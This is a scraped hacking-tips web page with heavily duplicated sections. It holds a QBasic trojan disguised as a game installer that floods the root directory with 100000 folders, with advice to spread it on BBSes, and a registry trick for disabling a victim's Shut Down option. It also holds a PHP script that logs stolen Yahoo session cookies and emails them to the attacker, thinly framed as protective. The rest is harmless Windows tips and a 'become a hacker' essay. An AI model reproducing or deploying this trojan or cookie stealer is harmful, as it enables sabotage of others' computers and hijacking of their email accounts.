…just kidding, it does not exist but such a virus would be something great =)
The greatest virus of all time ...
There is a virus on the net from a long time, the damage inflicted by it is unstoppable, or at least that was though, check it out yourself
Write your own Trojan virues..
This is a little trojan written in Qbasic 4.5 It's a bitch!
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"
How to use it?
This can pose as the installation program for a game. This means thatwhen you upload it to a BBS or something, and post that it is akickass game, people will download it and try to install it on theircomputers!
What does it do?
This program changes directory to the root and makes 100000 dirs inthe root. You cannot use deltree to wipe them out in one chunk andyou CANNOT get rid of them without doing reverse engineering on theprogram, ie. rd instead of md. To get rid of them any other way youwould have to format c: or d:
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"
How to use it?
This can pose as the installation program for a game. This means thatwhen you upload it to a BBS or something, and post that it is akickass game, people will download it and try to install it on theircomputers!
What does it do?
This program changes directory to the root and makes 100000 dirs inthe root. You cannot use deltree to wipe them out in one chunk andyou CANNOT get rid of them without doing reverse engineering on theprogram, ie. rd instead of md. To get rid of them any other way youwould have to format c: or d:
Remove ShutDown option...
This is a neat trick you can play on that lamer that has a huge ego, in this section I teach you, how to disable the Shut Down option in the Shut Down Dialog Box. This trick involves editing the registry, so please make backups.
Launch regedit.exe and go to :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box.
Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Start > Shut Down button displays the following error message:
This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.
You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.
Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoClose"="1"
Launch regedit.exe and go to :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box.
Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Start > Shut Down button displays the following error message:
This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.
You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.
Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoClose"="1"
Some Important Run commands ...
You may be knowing that to run a perticular windows executable program ( .exe, .pif, .com files) directly you need to open it from Start>Run and typing in the name of it.
Here are some of the useful shortcut commands.
(Tip - You can directly open 'Run' by pressing Windows+R keys at a time.)
command - to run MS - DOS (.com, .pif)
calc - to run calculator (.exe)
control - to open Control Panel (.exe)
defrag - to defrag the hard disk drives (.exe)
dialer - for dialing seups (.exe)
dosprompt - to get a minimized DOS window (.pif)
explorer - to open Windows Explorer (.exe., .scf)
ftp - for File Transfer Protocol if internet is connected (.exe)
ms-dos~1/ms-dos~2 - for fully MS-DOS mode.
No Windows O.S. (.pif)net - for net information cum help (.exe)
ping - for bytes information and bandwidth of internet connection information (.exe)
regedit - to open Registry (.exe)
telnet - command runner if the system is conncected in a UNIX system network (.exe)
tuneup - for Task Scheduling wizard, i.e. Task Maintanance (.exe)
notepad - to run Notepad (.exe)
write - to run Wordpad (.exe)
scanregw - to scan the Registry and to backup it (.exe)
progman - to maintain, run and view the files in all drives (.exe)
directcc - to join your computer in cable conncetion with other computers (.exe)
scandskw - to open Scandisk to scan the hard drives (.exe)
winfile - Windows File Managertaskman - to manage current running open programs or files.Nice replacement for default Windows taskbar
msconfig - to maintain the configuration of computer. It will show the options like General, Startup including files Autoexec.bat, Config.sys, System.ini and Win.ini. (Autoexec.bat & Config.sys are MS-DOS files)
winrep - to run Windows Report Tool - Accessories>System Tools>System Information (.exe)winver - to know the version of Windowspackager - insert objects in documets, presentations or worksheets
winfile - another Windows Explorer (.exe)
clipbook - a simple utility that allws you to save and recall several pages or graphics. (.exe)sysedit - view or edit system files from within one window (.exe)
Here are some of the useful shortcut commands.
(Tip - You can directly open 'Run' by pressing Windows+R keys at a time.)
command - to run MS - DOS (.com, .pif)
calc - to run calculator (.exe)
control - to open Control Panel (.exe)
defrag - to defrag the hard disk drives (.exe)
dialer - for dialing seups (.exe)
dosprompt - to get a minimized DOS window (.pif)
explorer - to open Windows Explorer (.exe., .scf)
ftp - for File Transfer Protocol if internet is connected (.exe)
ms-dos~1/ms-dos~2 - for fully MS-DOS mode.
No Windows O.S. (.pif)net - for net information cum help (.exe)
ping - for bytes information and bandwidth of internet connection information (.exe)
regedit - to open Registry (.exe)
telnet - command runner if the system is conncected in a UNIX system network (.exe)
tuneup - for Task Scheduling wizard, i.e. Task Maintanance (.exe)
notepad - to run Notepad (.exe)
write - to run Wordpad (.exe)
scanregw - to scan the Registry and to backup it (.exe)
progman - to maintain, run and view the files in all drives (.exe)
directcc - to join your computer in cable conncetion with other computers (.exe)
scandskw - to open Scandisk to scan the hard drives (.exe)
winfile - Windows File Managertaskman - to manage current running open programs or files.Nice replacement for default Windows taskbar
msconfig - to maintain the configuration of computer. It will show the options like General, Startup including files Autoexec.bat, Config.sys, System.ini and Win.ini. (Autoexec.bat & Config.sys are MS-DOS files)
winrep - to run Windows Report Tool - Accessories>System Tools>System Information (.exe)winver - to know the version of Windowspackager - insert objects in documets, presentations or worksheets
winfile - another Windows Explorer (.exe)
clipbook - a simple utility that allws you to save and recall several pages or graphics. (.exe)sysedit - view or edit system files from within one window (.exe)
Increase ur Internet speed...
Try this , if you have windows XP professionalthis is for broad band connections/dial up running Windows XP.
1. log on as Administrator.
2. start - run - type gpedit.msc
3. expand "local computer policy"
4. then expand "administrative templates"
5. then expand "network branch"
6. Highlight the "QoS Packet Scheduler"
7. on right window double click "limit reservable bandwidth"
8. on setting tab check the "enabled"
9. change "Bandwidth limit %" to 0reboot if promptedthis is because Windows XP reserve 20% of the bandwidth for its self.
====================================================================================
TECH :2Host Resolution Priority Tweak host name resolution priority
===================================================================
Windows 2k/XP
First,
open the Windows Registry using Regedit, and (after backing up) navigate to:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider
Note the following lines (all hex dwords):
Class = 008 (8) - indicates that TCP/IP is a name service provider, don't change.
LocalPriority = 1f3 (499) - local names cache
HostsPriority = 1f4 (500) - the HOSTS file
DnsPriority = 7d0 (2000) - DNS
NetbtPriority = 7d1 (2001) - NetBT name-resolution, including WINS
What we're aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we're aiming at is lower numbers without going to extremes, something like what's shown below should work well:
Change the "Priority" lines to:
LocalPriority = 005 (5) - local names cache
HostsPriority = 006 (6) - the HOSTS file
DnsPriority = 007 (7) - DNS
NetbtPriority = 008 (8) - NetBT name-resolution, including WINS
1. log on as Administrator.
2. start - run - type gpedit.msc
3. expand "local computer policy"
4. then expand "administrative templates"
5. then expand "network branch"
6. Highlight the "QoS Packet Scheduler"
7. on right window double click "limit reservable bandwidth"
8. on setting tab check the "enabled"
9. change "Bandwidth limit %" to 0reboot if promptedthis is because Windows XP reserve 20% of the bandwidth for its self.
====================================================================================
TECH :2Host Resolution Priority Tweak host name resolution priority
===================================================================
Windows 2k/XP
First,
open the Windows Registry using Regedit, and (after backing up) navigate to:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider
Note the following lines (all hex dwords):
Class = 008 (8) - indicates that TCP/IP is a name service provider, don't change.
LocalPriority = 1f3 (499) - local names cache
HostsPriority = 1f4 (500) - the HOSTS file
DnsPriority = 7d0 (2000) - DNS
NetbtPriority = 7d1 (2001) - NetBT name-resolution, including WINS
What we're aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we're aiming at is lower numbers without going to extremes, something like what's shown below should work well:
Change the "Priority" lines to:
LocalPriority = 005 (5) - local names cache
HostsPriority = 006 (6) - the HOSTS file
DnsPriority = 007 (7) - DNS
NetbtPriority = 008 (8) - NetBT name-resolution, including WINS
Open the Command Prompt from the Right-Click Menu
I began computing in the days of DOS, and I still can't give up the command prompt. When it comes to doing down-and-dirty tasks like mass deleting or renaming of files, nothing beats it. I find myself frequently switching back and forth between Windows Explorer and the command prompt.Often, when using Windows Explorer, I want to open the command prompt at the folder that's my current location.
That takes too many steps: opening a command prompt and then navigating to my current folder.
However, there's a quicker way: you can add an option to the right-click context menu that will open a command prompt at your current folder.
For example, if you were to right-click the
C:\My Stuff folder,
you could then choose to open a command prompt at
C:\My Stuff.To add the option, run the Registry Editor, then go to
HKEY_LOCAL_MACHINE/Software/Classes/Folder/Shell.
Create a new key called Command Prompt. For the default value, enter whatever text you want to appear when you right-click a folderfor example, Open Command Prompt.
Create a new key beneath the Command Prompt key called Command.
Set the default value to Cmd.exe /k pushd %L.
That value will launch Cmd.exe, which is the XP command prompt.
The /k switch puts the prompt into interactive mode.
That is, it lets you issue commands from the command prompt; the command prompt isn't being used to issue only a single command and then exit. The pushd command stores the name of the current directory, and %L uses that name to start the command prompt at it.
Exit the Registry.
The new menu option will show up immediately.
Note that it won't appear when you right-click a file; it shows up only when you right-click a folder.While many of us like fussing around with the Registry rather than doing things the easy way, there's also a way to add this option to your right-click context menu without editing the Registry.
Download and install a free copy of Microsoft's Open Command Window Here PowerToy from http://www.microsoft.com/windowsxp/pro/downloads/powertoys.asp.
Learn to HAck.....
Hackers are great Programmers . Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.
Don’ts
No one will search for “how to become a hacker” & learn Hacking in google except newbie. People like to be a Hacker, and burst the network, server and so on. You can get a clear idea here. After reading this article you can get an idea about becoming as a Hacker.
Don’ts
Hacking Tools
Don’t search for “Download Hacking tools” , “Windows hacking tool” , “Hacking software” , “Email hacking”,’ Yahoo password cracking” or any thing.
Download tools
Don’t download such tools by above results. And don’t download and install tools from Yahoo chat room people or individuals. Because those tools may open your system’s backdoor and you will be hacked and your system will be used for Spamming proxy.
Key Loggers and Spy
Don’t download and install spy or key loggers to trace your roommates or your brother/sister. Don’t be proud of yourself that you successfully traced them. They will trace you for its Owner.
Start Hacking
Don’t test installed tools yourself against Yahoo.com or any other site. Don’t think Yahoo’s server will be hacked by you and that Lame tool.
Teach me how to hack
Don’t beg others by asking “teach me how to hack”, “Tell me how to hack”,” Help me in cracking this Y! Id”
Black/White Hat
Don’t punch tattoos like “Black Hat Hacker”, “The Hacker” & “Hack me if you can”
Username & Email
Don’t create Yahoo Ids like “HackMeAlive”, “Thomas_A_Peterson” and any suffix or prefix with the words Hacker, BlackHat & so on.
Hacker and Films
Don’t think yourself as a hacker after seeing “The Matrix” film and don’t try to dodge the dogs while they try to bite you.
How you can become a Hacker?
Learn Hacking
Improve Skills First learn things and improve your Skills. learn php for web development.
#A
Start writing small and small tools yourself, like port scanner, service scanner etc. In python,perl or such a simple but effective languages.
#B
Use them to protect your system and server.
#C
Read more articles about Bugs and fixes.
#D
Tune up yourself as a troubleshooter.
#E
Every backdoor has a Lock.Try to find the Locks or Make a better one.
#F
Try to understand the core things. For example Understand what is the kernel,Understand the Protocols, Start writing own protocols, Try to write a patch for linux kernal yourself.
#G
Be a Best Programmer.
Hacking is not means fully about exploiting and entering in to a network or server.
Modern Zen Poem:
To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
I really appreciate your interest to become a hacker. Start learning and improving your skills. Best of luck.
Don’ts
No one will search for “how to become a hacker” & learn Hacking in google except newbie. People like to be a Hacker, and burst the network, server and so on. You can get a clear idea here. After reading this article you can get an idea about becoming as a Hacker.
Don’ts
Hacking Tools
Don’t search for “Download Hacking tools” , “Windows hacking tool” , “Hacking software” , “Email hacking”,’ Yahoo password cracking” or any thing.
Download tools
Don’t download such tools by above results. And don’t download and install tools from Yahoo chat room people or individuals. Because those tools may open your system’s backdoor and you will be hacked and your system will be used for Spamming proxy.
Key Loggers and Spy
Don’t download and install spy or key loggers to trace your roommates or your brother/sister. Don’t be proud of yourself that you successfully traced them. They will trace you for its Owner.
Start Hacking
Don’t test installed tools yourself against Yahoo.com or any other site. Don’t think Yahoo’s server will be hacked by you and that Lame tool.
Teach me how to hack
Don’t beg others by asking “teach me how to hack”, “Tell me how to hack”,” Help me in cracking this Y! Id”
Black/White Hat
Don’t punch tattoos like “Black Hat Hacker”, “The Hacker” & “Hack me if you can”
Username & Email
Don’t create Yahoo Ids like “HackMeAlive”, “Thomas_A_Peterson” and any suffix or prefix with the words Hacker, BlackHat & so on.
Hacker and Films
Don’t think yourself as a hacker after seeing “The Matrix” film and don’t try to dodge the dogs while they try to bite you.
How you can become a Hacker?
Learn Hacking
Improve Skills First learn things and improve your Skills. learn php for web development.
#A
Start writing small and small tools yourself, like port scanner, service scanner etc. In python,perl or such a simple but effective languages.
#B
Use them to protect your system and server.
#C
Read more articles about Bugs and fixes.
#D
Tune up yourself as a troubleshooter.
#E
Every backdoor has a Lock.Try to find the Locks or Make a better one.
#F
Try to understand the core things. For example Understand what is the kernel,Understand the Protocols, Start writing own protocols, Try to write a patch for linux kernal yourself.
#G
Be a Best Programmer.
Hacking is not means fully about exploiting and entering in to a network or server.
Modern Zen Poem:
To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
I really appreciate your interest to become a hacker. Start learning and improving your skills. Best of luck.
How hackers steal or hack Yahoo Passwords....
This article is meant to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someone’s info, password etc. It’s purely informative.
I did a search on this new thing that they use, it had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it’s easyer to attack than to deffend they say.
It didn’t take me too much to find this code which writes the recipient’s cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim’s yahoo email.
The bug:
…which calls this php script:
$file=”cookie.log”;
if (isset($_REQUEST[”id”]) &&isset($_REQUEST[”cookie”])){
$logcookie =$_REQUEST[”cookie”];
$logcookie =rawurldecode($logcookie);
$logemail = $_REQUEST[”id”];
$logemail =rawurldecode($logemail);
if (file_exists($file)){
$handle=fopen($file,”r+”);
$filecontence=fread($handle,filesize(”$file”));
fclose($handle);
}
$handle=fopen($file, “w”);
fwrite($handle, “$logemail -$logcookie\n$filecontence\n “);
//Writing email address and cookiethen the rest of the log
fclose($handle);
mail(”email”, “$logemail”,”$logemail\n$logcookie\n$filecontence\n”);
}
header(”Location:http://mail.yahoo.com”); ?> …which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly.
NOTE: The code is a little changed to make it hard to use without PHP knowledge.
How to protect yourself? My advice: DON’T EVER OPEN EMAILS FROM AN UNKNOWN SENDER
I did a search on this new thing that they use, it had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it’s easyer to attack than to deffend they say.
It didn’t take me too much to find this code which writes the recipient’s cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim’s yahoo email.
The bug:
…which calls this php script:
$file=”cookie.log”;
if (isset($_REQUEST[”id”]) &&isset($_REQUEST[”cookie”])){
$logcookie =$_REQUEST[”cookie”];
$logcookie =rawurldecode($logcookie);
$logemail = $_REQUEST[”id”];
$logemail =rawurldecode($logemail);
if (file_exists($file)){
$handle=fopen($file,”r+”);
$filecontence=fread($handle,filesize(”$file”));
fclose($handle);
}
$handle=fopen($file, “w”);
fwrite($handle, “$logemail -$logcookie\n$filecontence\n “);
//Writing email address and cookiethen the rest of the log
fclose($handle);
mail(”email”, “$logemail”,”$logemail\n$logcookie\n$filecontence\n”);
}
header(”Location:http://mail.yahoo.com”); ?> …which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly.
NOTE: The code is a little changed to make it hard to use without PHP knowledge.
How to protect yourself? My advice: DON’T EVER OPEN EMAILS FROM AN UNKNOWN SENDER